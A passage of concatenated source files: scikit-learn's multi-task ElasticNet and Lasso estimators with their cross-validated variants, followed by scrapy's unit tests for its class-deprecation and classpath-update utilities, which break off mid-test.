        Number of alphas along the regularization path, used for each l1_ratio.

    alphas : numpy array, optional
        List of alphas where to compute the models.
        If None alphas are set automatically

    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument.

    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    cv : integer or cross-validation generator, optional
        If an integer is passed, it is the number of fold (default 3).
        Specific cross-validation objects can be passed, see the
        :mod:`sklearn.cross_validation` module for the list of possible
        objects.

    verbose : bool or integer
        Amount of verbosity.

    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs.

    positive : bool, optional
        When set to ``True``, forces the coefficients to be positive.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    Attributes
    ----------
    alpha_ : float
        The amount of penalization chosen by cross validation

    l1_ratio_ : float
        The compromise between l1 and l2 penalization chosen by
        cross validation

    coef_ : array, shape (n_features,) | (n_targets, n_features)
        Parameter vector (w in the cost function formula),

    intercept_ : float | array, shape (n_targets, n_features)
        Independent term in the decision function.

    mse_path_ : array, shape (n_l1_ratio, n_alpha, n_folds)
        Mean square error for the test set on each fold, varying l1_ratio and
        alpha.

    alphas_ : numpy array, shape (n_alphas,) or (n_l1_ratio, n_alphas)
        The grid of alphas used for fitting, for each l1_ratio.

    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance for the optimal alpha.

    Notes
    -----
    See examples/linear_model/lasso_path_with_crossvalidation.py
    for an example.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.

    The parameter l1_ratio corresponds to alpha in the glmnet R package
    while alpha corresponds to the lambda parameter in glmnet.
    More specifically, the optimization objective is::

        1 / (2 * n_samples) * ||y - Xw||^2_2 +
        + alpha * l1_ratio * ||w||_1
        + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2

    If you are interested in controlling the L1 and L2 penalty
    separately, keep in mind that this is equivalent to::

        a * L1 + b * L2

    for::

        alpha = a + b and l1_ratio = a / (a + b).

    See also
    --------
    enet_path
    ElasticNet
    """
    # Path function used by LinearModelCV.fit for the per-fold model fits.
    path = staticmethod(enet_path)

    def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
                 fit_intercept=True, normalize=False, precompute='auto',
                 max_iter=1000, tol=1e-4, cv=None, copy_X=True,
                 verbose=0, n_jobs=1, positive=False, random_state=None,
                 selection='cyclic'):
        # Hyper-parameters are stored verbatim, per the scikit-learn
        # estimator convention (no validation or conversion in __init__).
        self.l1_ratio = l1_ratio
        self.eps = eps
        self.n_alphas = n_alphas
        self.alphas = alphas
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.precompute = precompute
        self.max_iter = max_iter
        self.tol = tol
        self.cv = cv
        self.copy_X = copy_X
        self.verbose = verbose
        self.n_jobs = n_jobs
        self.positive = positive
        self.random_state = random_state
        self.selection = selection
###############################################################################
# Multi Task ElasticNet and Lasso models (with joint feature selection)
class MultiTaskElasticNet(Lasso):
    r"""Multi-task ElasticNet model trained with L1/L2 mixed-norm as regularizer
    The optimization objective for MultiTaskElasticNet is::
        (1 / (2 * n_samples)) * ||Y - XW||^Fro_2
        + alpha * l1_ratio * ||W||_21
        + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
    Where::
        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norm of each row.
    Read more in the :ref:`User Guide <multi_task_lasso>`.
    Parameters
    ----------
    alpha : float, optional
        Constant that multiplies the L1/L2 term. Defaults to 1.0
    l1_ratio : float
        The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
        For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
        is an L1 penalty.
        For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.
    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).
    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.
    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.
    max_iter : int, optional
        The maximum number of iterations
    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.
    warm_start : bool, optional
        When set to ``True``, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.
    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.
    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.
    Attributes
    ----------
    intercept_ : array, shape (n_tasks,)
        Independent term in decision function.
    coef_ : array, shape (n_tasks, n_features)
        Parameter vector (W in the cost function formula). If a 1D y is \
        passed in at fit (non multi-task usage), ``coef_`` is then a 1D array
    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.
    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.MultiTaskElasticNet(alpha=0.1)
    >>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
    ... #doctest: +NORMALIZE_WHITESPACE
    MultiTaskElasticNet(alpha=0.1, copy_X=True, fit_intercept=True,
            l1_ratio=0.5, max_iter=1000, normalize=False, random_state=None,
            selection='cyclic', tol=0.0001, warm_start=False)
    >>> print(clf.coef_)
    [[ 0.45663524 0.45612256]
     [ 0.45663524 0.45612256]]
    >>> print(clf.intercept_)
    [ 0.0872422 0.0872422]
    See also
    --------
    ElasticNet, MultiTaskLasso
    Notes
    -----
    The algorithm used to fit the model is coordinate descent.
    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
                 normalize=False, copy_X=True, max_iter=1000, tol=1e-4,
                 warm_start=False, random_state=None, selection='cyclic'):
        # Parameters are stored verbatim (scikit-learn estimator convention);
        # validation happens in fit().
        self.l1_ratio = l1_ratio
        self.alpha = alpha
        self.coef_ = None
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.max_iter = max_iter
        self.copy_X = copy_X
        self.tol = tol
        self.warm_start = warm_start
        self.random_state = random_state
        self.selection = selection
    def fit(self, X, y):
        """Fit MultiTaskElasticNet model with coordinate descent
        Parameters
        -----------
        X : ndarray, shape (n_samples, n_features)
            Data
        y : ndarray, shape (n_samples, n_tasks)
            Target
        Returns
        -------
        self : returns an instance of self.
        Notes
        -----
        Coordinate descent is an algorithm that considers each column of
        data at a time hence it will automatically convert the X input
        as a Fortran-contiguous numpy array if necessary.
        To avoid memory re-allocation it is advised to allocate the
        initial data in memory directly using that format.
        """
        # X and y must be of type float64
        X = check_array(X, dtype=np.float64, order='F',
                        copy=self.copy_X and self.fit_intercept)
        y = np.asarray(y, dtype=np.float64)
        # Pick the model name used in the error message below.
        # NOTE(review): both this class and MultiTaskLasso set l1_ratio in
        # __init__, so hasattr() is always True here and the message always
        # says 'ElasticNet' — confirm whether that is intended.
        if hasattr(self, 'l1_ratio'):
            model_str = 'ElasticNet'
        else:
            model_str = 'Lasso'
        if y.ndim == 1:
            raise ValueError("For mono-task outputs, use %s" % model_str)
        n_samples, n_features = X.shape
        _, n_tasks = y.shape
        if n_samples != y.shape[0]:
            raise ValueError("X and y have inconsistent dimensions (%d != %d)"
                             % (n_samples, y.shape[0]))
        # Center (and optionally scale) the data; the intercept is recovered
        # afterwards from the removed means via _set_intercept().
        X, y, X_mean, y_mean, X_std = center_data(
            X, y, self.fit_intercept, self.normalize, copy=False)
        # Start from zeros unless warm-starting from a previous fit.
        if not self.warm_start or self.coef_ is None:
            self.coef_ = np.zeros((n_tasks, n_features), dtype=np.float64,
                                  order='F')
        # Scale the penalties by n_samples to match the objective in the
        # class docstring (which divides the loss by 2 * n_samples).
        l1_reg = self.alpha * self.l1_ratio * n_samples
        l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
        self.coef_ = np.asfortranarray(self.coef_)  # coef contiguous in memory
        if self.selection not in ['random', 'cyclic']:
            raise ValueError("selection should be either random or cyclic.")
        random = (self.selection == 'random')
        # Delegate the actual optimization to the Cython solver.
        self.coef_, self.dual_gap_, self.eps_, self.n_iter_ = \
            cd_fast.enet_coordinate_descent_multi_task(
                self.coef_, l1_reg, l2_reg, X, y, self.max_iter, self.tol,
                check_random_state(self.random_state), random)
        self._set_intercept(X_mean, y_mean, X_std)
        # A dual gap above the tolerance means max_iter was exhausted first.
        if self.dual_gap_ > self.eps_:
            warnings.warn('Objective did not converge, you might want'
                          ' to increase the number of iterations')
        # return self for chaining fit and predict calls
        return self
class MultiTaskLasso(MultiTaskElasticNet):
    r"""Multi-task Lasso model trained with L1/L2 mixed-norm as regularizer
    The optimization objective for Lasso is::
        (1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21
    Where::
        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norm of each row.
    Read more in the :ref:`User Guide <multi_task_lasso>`.
    Parameters
    ----------
    alpha : float, optional
        Constant that multiplies the L1/L2 term. Defaults to 1.0
    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).
    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.
    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.
    max_iter : int, optional
        The maximum number of iterations.
    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.
    warm_start : bool, optional
        When set to ``True``, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.
    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4
    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.
    Attributes
    ----------
    coef_ : array, shape (n_tasks, n_features)
        parameter vector (W in the cost function formula)
    intercept_ : array, shape (n_tasks,)
        independent term in decision function.
    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.
    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.MultiTaskLasso(alpha=0.1)
    >>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
    MultiTaskLasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
        normalize=False, random_state=None, selection='cyclic', tol=0.0001,
        warm_start=False)
    >>> print(clf.coef_)
    [[ 0.89393398 0. ]
     [ 0.89393398 0. ]]
    >>> print(clf.intercept_)
    [ 0.10606602 0.10606602]
    See also
    --------
    Lasso, MultiTaskElasticNet
    Notes
    -----
    The algorithm used to fit the model is coordinate descent.
    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
                 copy_X=True, max_iter=1000, tol=1e-4, warm_start=False,
                 random_state=None, selection='cyclic'):
        self.alpha = alpha
        self.coef_ = None
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.max_iter = max_iter
        self.copy_X = copy_X
        self.tol = tol
        self.warm_start = warm_start
        # Fixed at 1.0 (pure L1/L2 penalty, no ridge term): this is what turns
        # the inherited MultiTaskElasticNet.fit() into a multi-task Lasso.
        self.l1_ratio = 1.0
        self.random_state = random_state
        self.selection = selection
class MultiTaskElasticNetCV(LinearModelCV, RegressorMixin):
    r"""Multi-task L1/L2 ElasticNet with built-in cross-validation.
    The optimization objective for MultiTaskElasticNet is::
        (1 / (2 * n_samples)) * ||Y - XW||^Fro_2
        + alpha * l1_ratio * ||W||_21
        + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
    Where::
        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norm of each row.
    Read more in the :ref:`User Guide <multi_task_lasso>`.
    Parameters
    ----------
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.
    alphas : array-like, optional
        List of alphas where to compute the models.
        If not provided, set automatically.
    n_alphas : int, optional
        Number of alphas along the regularization path
    l1_ratio : float or array of floats
        The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
        For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
        is an L1 penalty.
        For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.
    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).
    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.
    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.
    max_iter : int, optional
        The maximum number of iterations
    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.
    cv : integer or cross-validation generator, optional
        If an integer is passed, it is the number of fold (default 3).
        Specific cross-validation objects can be passed, see the
        :mod:`sklearn.cross_validation` module for the list of possible
        objects.
    verbose : bool or integer
        Amount of verbosity.
    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs. Note that this is used only if multiple values for
        l1_ratio are given.
    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.
    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.
    Attributes
    ----------
    intercept_ : array, shape (n_tasks,)
        Independent term in decision function.
    coef_ : array, shape (n_tasks, n_features)
        Parameter vector (W in the cost function formula).
    alpha_ : float
        The amount of penalization chosen by cross validation
    mse_path_ : array, shape (n_alphas, n_folds) or \
                (n_l1_ratio, n_alphas, n_folds)
        mean square error for the test set on each fold, varying alpha
    alphas_ : numpy array, shape (n_alphas,) or (n_l1_ratio, n_alphas)
        The grid of alphas used for fitting, for each l1_ratio
    l1_ratio_ : float
        best l1_ratio obtained by cross-validation.
    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance for the optimal alpha.
    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.MultiTaskElasticNetCV()
    >>> clf.fit([[0,0], [1, 1], [2, 2]],
    ...         [[0, 0], [1, 1], [2, 2]])
    ... #doctest: +NORMALIZE_WHITESPACE
    MultiTaskElasticNetCV(alphas=None, copy_X=True, cv=None, eps=0.001,
           fit_intercept=True, l1_ratio=0.5, max_iter=1000, n_alphas=100,
           n_jobs=1, normalize=False, random_state=None, selection='cyclic',
           tol=0.0001, verbose=0)
    >>> print(clf.coef_)
    [[ 0.52875032 0.46958558]
     [ 0.52875032 0.46958558]]
    >>> print(clf.intercept_)
    [ 0.00166409 0.00166409]
    See also
    --------
    MultiTaskElasticNet
    ElasticNetCV
    MultiTaskLassoCV
    Notes
    -----
    The algorithm used to fit the model is coordinate descent.
    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    # Path function used by the inherited LinearModelCV.fit machinery.
    path = staticmethod(enet_path)
    def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
                 fit_intercept=True, normalize=False,
                 max_iter=1000, tol=1e-4, cv=None, copy_X=True,
                 verbose=0, n_jobs=1, random_state=None, selection='cyclic'):
        # NOTE(review): attributes are assigned directly, whereas the sibling
        # MultiTaskLassoCV delegates to super().__init__ — confirm the two
        # should not be made consistent.
        self.l1_ratio = l1_ratio
        self.eps = eps
        self.n_alphas = n_alphas
        self.alphas = alphas
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.max_iter = max_iter
        self.tol = tol
        self.cv = cv
        self.copy_X = copy_X
        self.verbose = verbose
        self.n_jobs = n_jobs
        self.random_state = random_state
        self.selection = selection
class MultiTaskLassoCV(LinearModelCV, RegressorMixin):
    r"""Multi-task L1/L2 Lasso with built-in cross-validation.
    The optimization objective for MultiTaskLasso is::
        (1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * ||W||_21
    Where::
        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norm of each row.
    Read more in the :ref:`User Guide <multi_task_lasso>`.
    Parameters
    ----------
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.
    alphas : array-like, optional
        List of alphas where to compute the models.
        If not provided, set automatically.
    n_alphas : int, optional
        Number of alphas along the regularization path
    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).
    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.
    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.
    max_iter : int, optional
        The maximum number of iterations.
    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.
    cv : integer or cross-validation generator, optional
        If an integer is passed, it is the number of fold (default 3).
        Specific cross-validation objects can be passed, see the
        :mod:`sklearn.cross_validation` module for the list of possible
        objects.
    verbose : bool or integer
        Amount of verbosity.
    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs. Note that this is used only if multiple values for
        l1_ratio are given.
    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.
    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.
    Attributes
    ----------
    intercept_ : array, shape (n_tasks,)
        Independent term in decision function.
    coef_ : array, shape (n_tasks, n_features)
        Parameter vector (W in the cost function formula).
    alpha_ : float
        The amount of penalization chosen by cross validation
    mse_path_ : array, shape (n_alphas, n_folds)
        mean square error for the test set on each fold, varying alpha
    alphas_ : numpy array, shape (n_alphas,)
        The grid of alphas used for fitting.
    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance for the optimal alpha.
    See also
    --------
    MultiTaskElasticNet
    ElasticNetCV
    MultiTaskElasticNetCV
    Notes
    -----
    The algorithm used to fit the model is coordinate descent.
    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    # Path function used by the inherited LinearModelCV.fit machinery.
    path = staticmethod(lasso_path)
    def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
                 normalize=False, max_iter=1000, tol=1e-4, copy_X=True,
                 cv=None, verbose=False, n_jobs=1, random_state=None,
                 selection='cyclic'):
        # Delegate storage of all parameters to LinearModelCV.__init__.
        super(MultiTaskLassoCV, self).__init__(
            eps=eps, n_alphas=n_alphas, alphas=alphas,
            fit_intercept=fit_intercept, normalize=normalize,
            max_iter=max_iter, tol=tol, copy_X=copy_X,
            cv=cv, verbose=verbose, n_jobs=n_jobs, random_state=random_state,
            selection=selection)
wangjun/scrapy | tests/test_utils_deprecate.py | 140 | 10526 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import inspect
import unittest
import warnings
from scrapy.exceptions import ScrapyDeprecationWarning
from scrapy.utils.deprecate import create_deprecated_class, update_classpath
from tests import mock
class MyWarning(UserWarning):
    """Dedicated warning category so the tests can filter out unrelated warnings."""
class SomeBaseClass(object):
    """Plain new-style base class used as an ancestor for the fixtures below."""


class NewName(SomeBaseClass):
    """The 'new' class that deprecated aliases are expected to point at."""
class WarnWhenSubclassedTest(unittest.TestCase):
    """Tests for ``create_deprecated_class``: subclassing and instantiating a
    deprecated alias must emit the configured warning exactly where expected,
    while ``issubclass``/``isinstance`` keep treating the alias and the new
    class as interchangeable.
    """

    def _mywarnings(self, w, category=MyWarning):
        # Keep only warnings of the requested category.
        # Fixed: the comprehension previously hardcoded ``MyWarning`` and
        # silently ignored the ``category`` parameter; all existing callers
        # use the default, so behavior at current call sites is unchanged.
        return [x for x in w if x.category is category]

    def test_no_warning_on_definition(self):
        # Merely creating the deprecated alias must not warn.
        with warnings.catch_warnings(record=True) as w:
            Deprecated = create_deprecated_class('Deprecated', NewName)
        w = self._mywarnings(w)
        self.assertEqual(w, [])

    def test_subclassing_warning_message(self):
        # Subclassing the alias warns once, pointing at the new class path
        # and at the line where the subclass is defined.
        Deprecated = create_deprecated_class('Deprecated', NewName,
                                             warn_category=MyWarning)
        with warnings.catch_warnings(record=True) as w:
            class UserClass(Deprecated):
                pass
        w = self._mywarnings(w)
        self.assertEqual(len(w), 1)
        self.assertEqual(
            str(w[0].message),
            "tests.test_utils_deprecate.UserClass inherits from "
            "deprecated class tests.test_utils_deprecate.Deprecated, "
            "please inherit from tests.test_utils_deprecate.NewName."
            " (warning only on first subclass, there may be others)"
        )
        self.assertEqual(w[0].lineno, inspect.getsourcelines(UserClass)[1])

    def test_custom_class_paths(self):
        # Explicit old/new class paths must override the auto-detected ones
        # in both the subclassing and the instantiation warnings.
        Deprecated = create_deprecated_class('Deprecated', NewName,
                                             new_class_path='foo.NewClass',
                                             old_class_path='bar.OldClass',
                                             warn_category=MyWarning)
        with warnings.catch_warnings(record=True) as w:
            class UserClass(Deprecated):
                pass
            _ = Deprecated()
        w = self._mywarnings(w)
        self.assertEqual(len(w), 2)
        self.assertIn('foo.NewClass', str(w[0].message))
        self.assertIn('bar.OldClass', str(w[0].message))
        self.assertIn('foo.NewClass', str(w[1].message))
        self.assertIn('bar.OldClass', str(w[1].message))

    def test_subclassing_warns_only_on_direct_childs(self):
        # Grandchildren of the alias do not re-trigger the warning.
        Deprecated = create_deprecated_class('Deprecated', NewName,
                                             warn_once=False,
                                             warn_category=MyWarning)
        with warnings.catch_warnings(record=True) as w:
            class UserClass(Deprecated):
                pass
            class NoWarnOnMe(UserClass):
                pass
        w = self._mywarnings(w)
        self.assertEqual(len(w), 1)
        self.assertIn('UserClass', str(w[0].message))

    def test_subclassing_warns_once_by_default(self):
        # With the default warn_once=True only the first subclass warns.
        Deprecated = create_deprecated_class('Deprecated', NewName,
                                             warn_category=MyWarning)
        with warnings.catch_warnings(record=True) as w:
            class UserClass(Deprecated):
                pass
            class FooClass(Deprecated):
                pass
            class BarClass(Deprecated):
                pass
        w = self._mywarnings(w)
        self.assertEqual(len(w), 1)
        self.assertIn('UserClass', str(w[0].message))

    def test_warning_on_instance(self):
        # Instantiating the alias warns at the call line; instantiating a
        # user subclass does not.
        Deprecated = create_deprecated_class('Deprecated', NewName,
                                             warn_category=MyWarning)
        # ignore subclassing warnings
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', ScrapyDeprecationWarning)
            class UserClass(Deprecated):
                pass
        with warnings.catch_warnings(record=True) as w:
            _, lineno = Deprecated(), inspect.getlineno(inspect.currentframe())
            _ = UserClass()  # subclass instances don't warn
        w = self._mywarnings(w)
        self.assertEqual(len(w), 1)
        self.assertEqual(
            str(w[0].message),
            "tests.test_utils_deprecate.Deprecated is deprecated, "
            "instantiate tests.test_utils_deprecate.NewName instead."
        )
        self.assertEqual(w[0].lineno, lineno)

    def test_warning_auto_message(self):
        # When no explicit message is given, both class paths are mentioned.
        with warnings.catch_warnings(record=True) as w:
            Deprecated = create_deprecated_class('Deprecated', NewName)
            class UserClass2(Deprecated):
                pass
        msg = str(w[0].message)
        self.assertIn("tests.test_utils_deprecate.NewName", msg)
        self.assertIn("tests.test_utils_deprecate.Deprecated", msg)

    def test_issubclass(self):
        # The alias and the new class must be interchangeable for issubclass.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', ScrapyDeprecationWarning)
            DeprecatedName = create_deprecated_class('DeprecatedName', NewName)
            class UpdatedUserClass1(NewName):
                pass
            class UpdatedUserClass1a(NewName):
                pass
            class OutdatedUserClass1(DeprecatedName):
                pass
            class OutdatedUserClass1a(DeprecatedName):
                pass
            class UnrelatedClass(object):
                pass
            class OldStyleClass:
                pass
        assert issubclass(UpdatedUserClass1, NewName)
        assert issubclass(UpdatedUserClass1a, NewName)
        assert issubclass(UpdatedUserClass1, DeprecatedName)
        assert issubclass(UpdatedUserClass1a, DeprecatedName)
        assert issubclass(OutdatedUserClass1, DeprecatedName)
        assert not issubclass(UnrelatedClass, DeprecatedName)
        assert not issubclass(OldStyleClass, DeprecatedName)
        assert not issubclass(OldStyleClass, DeprecatedName)
        assert not issubclass(OutdatedUserClass1, OutdatedUserClass1a)
        assert not issubclass(OutdatedUserClass1a, OutdatedUserClass1)
        self.assertRaises(TypeError, issubclass, object(), DeprecatedName)

    def test_isinstance(self):
        # Same interchangeability guarantees for isinstance.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', ScrapyDeprecationWarning)
            DeprecatedName = create_deprecated_class('DeprecatedName', NewName)
            class UpdatedUserClass2(NewName):
                pass
            class UpdatedUserClass2a(NewName):
                pass
            class OutdatedUserClass2(DeprecatedName):
                pass
            class OutdatedUserClass2a(DeprecatedName):
                pass
            class UnrelatedClass(object):
                pass
            class OldStyleClass:
                pass
        assert isinstance(UpdatedUserClass2(), NewName)
        assert isinstance(UpdatedUserClass2a(), NewName)
        assert isinstance(UpdatedUserClass2(), DeprecatedName)
        assert isinstance(UpdatedUserClass2a(), DeprecatedName)
        assert isinstance(OutdatedUserClass2(), DeprecatedName)
        assert isinstance(OutdatedUserClass2a(), DeprecatedName)
        assert not isinstance(OutdatedUserClass2a(), OutdatedUserClass2)
        assert not isinstance(OutdatedUserClass2(), OutdatedUserClass2a)
        assert not isinstance(UnrelatedClass(), DeprecatedName)
        assert not isinstance(OldStyleClass(), DeprecatedName)

    def test_clsdict(self):
        # Extra class-dict entries are carried over to the alias.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', ScrapyDeprecationWarning)
            Deprecated = create_deprecated_class('Deprecated', NewName, {'foo': 'bar'})
        self.assertEqual(Deprecated.foo, 'bar')

    def test_deprecate_a_class_with_custom_metaclass(self):
        # Must not blow up when the new class has a non-'type' metaclass.
        Meta1 = type('Meta1', (type,), {})
        New = Meta1('New', (), {})
        Deprecated = create_deprecated_class('Deprecated', New)

    def test_deprecate_subclass_of_deprecated_class(self):
        # Deprecating a class that is itself a deprecated alias: creating the
        # chained alias is silent; using it warns with the chained paths.
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter('always')
            Deprecated = create_deprecated_class('Deprecated', NewName,
                                                 warn_category=MyWarning)
            AlsoDeprecated = create_deprecated_class('AlsoDeprecated', Deprecated,
                                                     new_class_path='foo.Bar',
                                                     warn_category=MyWarning)
        w = self._mywarnings(w)
        # Fixed: str(map(str, w)) produced a useless '<map object ...>'
        # failure message on Python 3; build the list explicitly instead.
        self.assertEqual(len(w), 0, str([str(m) for m in w]))
        with warnings.catch_warnings(record=True) as w:
            AlsoDeprecated()
            class UserClass(AlsoDeprecated):
                pass
        w = self._mywarnings(w)
        self.assertEqual(len(w), 2)
        self.assertIn('AlsoDeprecated', str(w[0].message))
        self.assertIn('foo.Bar', str(w[0].message))
        self.assertIn('AlsoDeprecated', str(w[1].message))
        self.assertIn('foo.Bar', str(w[1].message))

    def test_inspect_stack(self):
        # If stack inspection fails, a best-effort warning is still emitted.
        with mock.patch('inspect.stack', side_effect=IndexError):
            with warnings.catch_warnings(record=True) as w:
                DeprecatedName = create_deprecated_class('DeprecatedName', NewName)
                class SubClass(DeprecatedName):
                    pass
        self.assertIn("Error detecting parent module", str(w[0].message))
# Patch the rule table so the tests are independent of scrapy's real
# deprecation mappings; longer (more specific) prefixes are listed first.
@mock.patch('scrapy.utils.deprecate.DEPRECATION_RULES',
            [('scrapy.contrib.pipeline.', 'scrapy.pipelines.'),
             ('scrapy.contrib.', 'scrapy.extensions.')])
class UpdateClassPathTest(unittest.TestCase):
    """Tests for ``update_classpath``: deprecated dotted paths are rewritten
    (with a warning naming both paths), unknown paths pass through silently.
    """
    def test_old_path_gets_fixed(self):
        with warnings.catch_warnings(record=True) as w:
            output = update_classpath('scrapy.contrib.debug.Debug')
        self.assertEqual(output, 'scrapy.extensions.debug.Debug')
        self.assertEqual(len(w), 1)
        self.assertIn("scrapy.contrib.debug.Debug", str(w[0].message))
        self.assertIn("scrapy.extensions.debug.Debug", str(w[0].message))
    def test_sorted_replacement(self):
        # The more specific 'scrapy.contrib.pipeline.' rule must win over
        # the generic 'scrapy.contrib.' one.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', ScrapyDeprecationWarning)
            output = update_classpath('scrapy.contrib.pipeline.Pipeline')
        self.assertEqual(output, 'scrapy.pipelines.Pipeline')
    def test_unmatched_path_stays_the_same(self):
